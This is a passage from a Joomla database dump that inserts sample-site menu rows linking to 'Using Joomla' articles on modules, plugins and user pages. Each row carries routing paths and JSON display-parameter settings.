00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',207,208,0,'*',0),(305,'aboutjoomla','Banner','banner','','using-joomla/extensions/modules/display-modules/banner','index.php?option=com_content&view=article&id=7','component',1,413,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',193,194,0,'*',0),(306,'aboutjoomla','Search','search','','using-joomla/extensions/modules/utility-modules/search','index.php?option=com_content&view=article&id=40','component',1,414,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',209,210,0,'*',0),(307,'aboutjoomla','Random Image','random-image','','using-joomla/extensions/modules/display-modules/random-image','index.php?option=com_content&view=article&id=36','component',1,413,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',191,192,0,'*',0),(309,'aboutjoomla','News Flash','news-flash','','using-joomla/extensions/modules/content-modules/news-flash','index.php?option=com_content&view=article&id=31','component',1,411,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',169,170,0,'*',0),(310,'aboutjoomla','Latest Articles','latest-articles','','using-joomla/extensions/modules/content-modules/latest-articles','index.php?option=com_content&view=article&id=27','component',1,411,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',171,172,0,'*',0),(311,'aboutjoomla','Syndicate','syndicate','','using-joomla/extensions/modules/utility-modules/syndicate','index.php?option=com_content&view=article&id=45','component',1,414,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',205,206,0,'*',0),(312,'aboutjoomla','Login','login','','using-joomla/extensions/modules/user-modules/login','index.php?option=com_content&view=article&id=28','component',1,412,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',187,188,0,'*',0),(313,'aboutjoomla','Wrapper','wrapper','','using-joomla/extensions/modules/utility-modules/wrapper','index.php?option=com_content&view=article&id=59','component',1,414,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',213,214,0,'*',0),(316,'aboutjoomla','Home Page Atomic','home-page-atomic','','using-joomla/extensions/templates/atomic/home-page-atomic','index.php?option=com_content&view=featured','component',1,422,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"3\",\"num_columns\":\"3\",\"num_links\":\"0\",\"multi_column_order\":\"1\",\"orderby_pri\":\"\",\"orderby_sec\":\"front\",\"order_date\":\"\",\"show_pagination\":\"2\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',235,236,0,'*',0),(317,'aboutjoomla','System','system','','using-joomla/extensions/plugins/system','index.php?option=com_content&view=article&id=46','component',1,284,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',254,255,0,'*',0),(318,'aboutjoomla','Authentication','authentication','','using-joomla/extensions/plugins/authentication','index.php?option=com_content&view=article&id=5','component',1,284,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',242,243,0,'*',0),(319,'aboutjoomla','Content','content','','using-joomla/extensions/plugins/content','index.php?option=com_content&view=article&id=62','component',1,284,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',244,245,0,'*',0),(320,'aboutjoomla','Editors','editors','','using-joomla/extensions/plugins/editors','index.php?option=com_content&view=article&id=14','component',1,284,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',246,247,0,'*',0),(321,'aboutjoomla','Editors Extended','editors-extended','','using-joomla/extensions/plugins/editors-extended','index.php?option=com_content&view=article&id=15','component',1,284,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',248,249,0,'*',0),(322,'aboutjoomla','Search','search','','using-joomla/extensions/plugins/search','index.php?option=com_content&view=article&id=41','component',1,284,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',250,251,0,'*',0),(323,'aboutjoomla','User','user','','using-joomla/extensions/plugins/user','index.php?option=com_content&view=article&id=51','component',1,284,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',252,253,0,'*',0),(324,'aboutjoomla','Footer','footer','','using-joomla/extensions/modules/display-modules/footer','index.php?option=com_content&view=article&id=19','component',1,413,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',197,198,0,'*',0),(325,'aboutjoomla','Archive','archive','','using-joomla/extensions/modules/content-modules/archive','index.php?option=com_content&view=article&id=2','component',1,411,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',173,174,0,'*',0),(326,'aboutjoomla','Related Items','related-items','','using-joomla/extensions/modules/content-modules/related-items','index.php?option=com_content&view=article&id=37','component',1,411,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',175,176,0,'*',0),(402,'aboutjoomla','Login Form','login-form','','using-joomla/extensions/components/users-component/login-form','index.php?option=com_users&view=login','component',1,271,5,25,0,'0000-00-00 00:00:00',0,1,'',115,'{\"login_redirect_url\":\"\",\"logindescription_show\":\"1\",\"login_description\":\"\",\"login_image\":\"\",\"logout_redirect_url\":\"\",\"logoutdescription_show\":\"1\",\"logout_description\":\"\",\"logout_image\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',137,138,0,'*',0),(403,'aboutjoomla','User Profile','user-profile','','using-joomla/extensions/components/users-component/user-profile','index.php?option=com_users&view=profile','component',1,271,5,25,0,'0000-00-00 00:00:00',0,1,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',139,140,0,'*',0),(404,'aboutjoomla','Edit User Profile','edit-user-profile','','using-joomla/extensions/components/users-component/edit-user-profile','index.php?option=com_users&view=profile&layout=edit','component',1,271,5,25,0,'0000-00-00 00:00:00',0,1,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',141,142,0,'*',0),(405,'aboutjoomla','Registration Form','registration-form','','using-joomla/extensions/components/users-component/registration-form','index.php?option=com_users&view=registration','component',1,271,5,25,0,'0000-00-00 00:00:00',0,1,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',143,144,0,'*',0),(406,'aboutjoomla','Username Reminder Request','username-reminder','','using-joomla/extensions/components/users-component/username-reminder','index.php?option=com_users&view=remind','component',1,271,5,25,0,'0000-00-00 00:00:00',0,1,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',145,146,0,'*',0),(409,'aboutjoomla','Password Reset','password-reset','','using-joomla/extensions/components/users-component/password-reset','index.php?option=com_users&view=reset','component',1,271,5,25,0,'0000-00-00 00:00:00',0,1,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',147,148,0,'*',0),(410,'aboutjoomla','Feed Display','feed-display','','using-joomla/extensions/modules/display-modules/feed-display','index.php?option=com_content&view=article&id=16','component',1,413,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',195,196,0,'*',0),(411,'aboutjoomla','Content Modules','content-modules','','using-joomla/extensions/modules/content-modules','index.php?option=com_content&view=category&id=64','component',1,281,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"0\",\"show_category_title\":\"1\",\"page_subheading\":\"\",\"show_empty_categories\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"0\",\"show_headings\":\"0\",\"list_show_title\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"0\",\"list_show_author\":\"0\",\"filter_field\":\"hide\",\"orderby_pri\":\"\",\"orderby_sec\":\"order\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_limit\":\"0\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',166,181,0,'*',0),(412,'aboutjoomla','User Modules','user-modules','','using-joomla/extensions/modules/user-modules','index.php?option=com_content&view=category&id=65','component',1,281,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"0\",\"show_category_title\":\"1\",\"page_subheading\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"1\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"0\",\"show_headings\":\"0\",\"list_show_title\":\"1\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"0\",\"list_show_author\":\"0\",\"filter_field\":\"hide\",\"orderby_pri\":\"\",\"orderby_sec\":\"order\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_limit\":\"0\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',182,189,0,'*',0),(413,'aboutjoomla','Display Modules','display-modules','','using-joomla/extensions/modules/display-modules','index.php?option=com_content&view=category&id=66','component',1,281,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"0\",\"show_category_title\":\"1\",\"page_subheading\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"show_cat_num_articles\":\"\",\"display_num\":\"0\",\"show_headings\":\"0\",\"list_show_title\":\"1\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"0\",\"list_show_author\":\"0\",\"filter_field\":\"hide\",\"orderby_pri\":\"\",\"orderby_sec\":\"order\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_limit\":\"0\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',190,203,0,'*',0),(414,'aboutjoomla','Utility Modules','utility-modules','','using-joomla/extensions/modules/utility-modules','index.php?option=com_content&view=category&id=67','component',1,281,4,22,0,'0000-00-00 